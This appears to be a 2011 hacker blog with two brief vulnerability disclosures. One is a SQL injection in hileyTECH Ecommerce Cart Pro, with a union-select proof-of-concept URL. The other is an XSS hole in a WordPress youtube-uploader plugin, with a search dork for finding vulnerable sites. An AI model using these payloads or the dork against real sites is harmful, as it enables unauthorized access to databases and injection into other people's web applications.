Monday, November 14, 2011

hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection

Title      :    hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection
Vendor    :  http://www.hileytech.com
Links    :    http://www.hileytech.com/cartspec.html
Type     :    Web Application


Parameter 'proddetail.php' in hileyTECH Ecommerce Cart Pro is vulnetable to SQL Injection.
Proof of concept ::

http://localhost/proddetail.php?prod=[SQL]
http://localhost/proddetail.php?prod=-productname' union select concat(version())--+

~/p0pc0rn/~

Wednesday, November 2, 2011

Wordpress Plugin youtube-uploader Vulnerable to XSS

Title : Wordpress Plugin youtube-uploader Vulnerable to XSS
Dork  : inurl:"youtube-uploader/action.php?action="
by      : p0pc0rn


http://site.com/wp-content/plugins/youtube-uploader/action.php?action=[xss]




~/p0pc0rn/~